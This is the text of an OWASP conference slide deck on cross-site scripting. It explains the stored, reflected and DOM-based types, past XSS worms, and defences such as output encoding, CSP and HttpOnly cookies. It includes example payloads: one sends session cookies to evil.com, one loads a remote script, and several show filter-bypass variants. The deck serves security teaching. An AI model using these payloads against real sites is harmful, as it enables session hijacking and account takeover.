Owasp Top 10 A3: Cross Site Scripting (XSS)
•Download as PPTX, PDF•
3 likes•3,808 views
This document discusses cross-site scripting (XSS) attacks. It defines XSS as an attack where malicious scripts are injected into otherwise trusted websites. The document outlines three types of XSS attacks and provides examples of real-world XSS worms. It explains how to exploit stored, reflected, and DOM-based XSS vulnerabilities. Finally, it recommends ways to prevent XSS, including input and output filtering, encoding output, and using mitigations like HttpOnly cookies and content security policies.
Recommended
More Related Content
What's hot
What's hot (20)
Similar to Owasp Top 10 A3: Cross Site Scripting (XSS)
Similar to Owasp Top 10 A3: Cross Site Scripting (XSS) (20)
More from Michael Hendrickx
Recently uploaded
Recently uploaded (20)
Owasp Top 10 A3: Cross Site Scripting (XSS)
- 1. OWASP A3: Cross Site Scripting Dubai, UAE. 27 August 2014 Michael Hendrickx <mhendrickx@owasp.org>
- 2. Talk Outline • What is XSS? • Real life examples • How to exploit it? • How to prevent it?
- 3. What is XSS? • Cross Site Scripting (XSS) • An attack against other clients
- 4. What is XSS? (2) • Webpages are a mix of content, style and code – We want to inject code <html> <head> <style>h1 { color: #FF0000 }</style> </head> <body> <h1>Hello World</h1> <script> document.write(“How are you?”); </script> </body> </html> Style Content Code
- 5. What is XSS? (3) • Request: http://site.com/hello.php?name=<script>alert(“hack ed!”);</script> • Response: <html> <body> <div> Hello <script>alert(“hacked!”);</script>! </div> </body> </html>
- 6. What can be done with XSS? • Execute “Active content” – Client side scripts (usually JavaScript, vbscript, …) • Access cookie contents – Steal your session • Read keystrokes • Submit forms, send data, … • Exploit browser bugs
- 7. Real Life Examples • MySpace Worm “Samy”[1] – Visiting infected profile would add author as “friend”. – Infect own profile, thus infecting other friends – 1.000.000 infections in 20 hours • TweetDeck XSS Worm[2] – Users automatically retweeted malicious code – 80.000 infections [1] http://namb.la/popular/ [2] http://www.forbes.com/sites/davelewis/2014/06/11/twitter-experiences-xss-flaw-in-tweetdeck/
- 8. Real Life Examples (2) • Facebook[1] – Vulnerable to cross site scripting – Luckily, reported to Facebook security team • Yahoo! services[2] – 100’s of yahoo’s subdomains vulnerable – Basically everything with a comment [1] https://www.acunetix.com/websitesecurity/xss-facebook/ [2] http://nahamsec.com/2014/05/how-i-xssed-all-of-yahoos-services/
- 9. How to exploit XSS? • Try to display your code to somebody else • 3 Types of XSS – Stored XSS • Persistent XSS • Malicious payload is stored in DB and is run by others – Reflected XSS • Non persistent • Payload is embedded in URL • Victim visits malicious URL and gets exploited – DOM based XSS • Payload executed by modifying DOM environment • Can be persistent / non-persistent
- 10. How to exploit stored XSS? • Requirements: – Web page that saves user input – Displays unfiltered* input back to others • Same page (comment, posts on a forum, …) • Other page (in app messages, ads, profile …) *: Unfiltered or inadequately filtered
- 11. How to exploit stored XSS? (2) • Career website First name: John Last name: Doe<script>document.write(‘<img src=“http://evil.com/a.gif?’ + escape(document.cookie) +’”/>’)</script> Evil.com Inject active content Access “resume” Cookie contains session ID, attacker can log in as victim. HR ManagerAttacker
- 12. How to exploit reflected XSS? • Requirements: – Web page that displays unfiltered* part of the URL – Convince victim to click on a link • Using “social engineering”, email, IM, … • May bypass phishing attacks (correct domain) • Payload can be obfuscated *: Unfiltered or inadequately filtered
- 13. How to exploit reflected XSS? (2) • Career website Hey, this candidate seems interesting! http://site.com/search_cv.aspx?name=<script src=“http://evil.com/a.js”></script> Evil.com Victim loads malicious JavaScript
- 14. How to exploit DOM XSS? • When webpage modifies the DOM (Document Object Model) http://site.com/page.php#<script>alert(‘xss’);</script> <html> … <script type=“text/javascript” src=“jquery.js”></script> <script> $(“#mydiv”).after(“Site is at : “ + document.location.href); </script> <div id=“mydiv”></div> … </html>
- 15. How to prevent XSS? • Clients: Disable JavaScript • Web Application Firewall – Microsoft IIS Secure Parameter Filtering ISS module that only accepts untampered input https://spf.codeplex.com/ – ModSecurity Opensource WAF module to detect and block attacks http://modsecurity.org
- 16. How to prevent XSS? (2) • Solve the problem at the core: • Code refactoring – Data input filtering • Make sure we don’t accept / store any unwanted data – Data output filtering / encoding • Even if we have unwanted data, escape it so we don’t execute JavaScript
- 17. How to prevent XSS? (3) • Convert output characters – Encoded characters will not be interpreted Original Encoded & & < < > > “ " ‘ ' / / https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
- 18. How to prevent XSS? (4) • It’s not just about stripping out HTML tags – If you only filter out “<script>”: <scr<script>ipt> • Injection can happen in many places: – Event handlers: <body onload=“alert(‘xss’);”> – CSS <p style=“background:url(‘javascript:alert(123)’);”> – URLS <img title=something onclick=alert(1) ...> Look ma, no quotes!
- 19. How to prevent XSS? (5) • Useful code libraries – Owasp HTML Sanitizer Project https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project – Microsoft Web Protection Library http://wpl.codeplex.com/ – Microsoft AntiXSS Library http://www.microsoft.com/en-us/download/details.aspx?id=43126 – HTML Purifier http://htmlpurifier.org/
- 20. XSS Mitigations • use HttpOnly cookies – Will prevent JS from accessing cookies Cache-Control: private Content-Length: 150 Content-Type: text/html; charset=utf-8 Date: Mon, 25 Aug 2014 10:26:07 GMT Location: /fvquickpay/frmPayOnline.aspx Server: Microsoft-IIS/8.5 Set-Cookie: ASP.NET_SessionId=iqqkkt55il3ynxuqi1dckk55; path=/; HttpOnly X-Aspnet-Version: 2.0.50727 X-Powered-By: ASP.NET
- 21. XSS Mitigations (2) • Implement CSP – Content Security Policy – White list origins of external data Content-Security-Policy: default-src: 'self'; script-src: 'self' static.domain.tld Allow JS, CSS and images from same host. Allow JS also from static.domain.tld.
- 22. XSS Mitigations (3) • Instruct to disable XSS protection on IE/Chrome X-XSS-Protection: 1; mode=block 0 Disable XSS protection 1 Enables XSS protection 1; mode=block Enabled, blocks page instead of sanitizing 1; report=url Enabled, allow report to be sent to specific URL Source: http://blog.veracode.com/2014/03/guidelines-for-setting-security-headers/
- 23. Conclusion • You’re not the target, your users are – Customers, sysadmins, … • Don’t trust anything coming from user – Even if it’s stored in the DB – Check it server side, always. • Filter using whitelists, not blacklists • Layered security measures • Escape all output
- 24. Questions? Michael Hendrickx mhendrickx@owasp.org | @ndrix Further reading: https://www.owasp.org/index.php/XSS_Prevention_Cheat_Sheet https://html5sec.org/ http://securityoverride.org/filedb/file_db/Articles/xss.pdf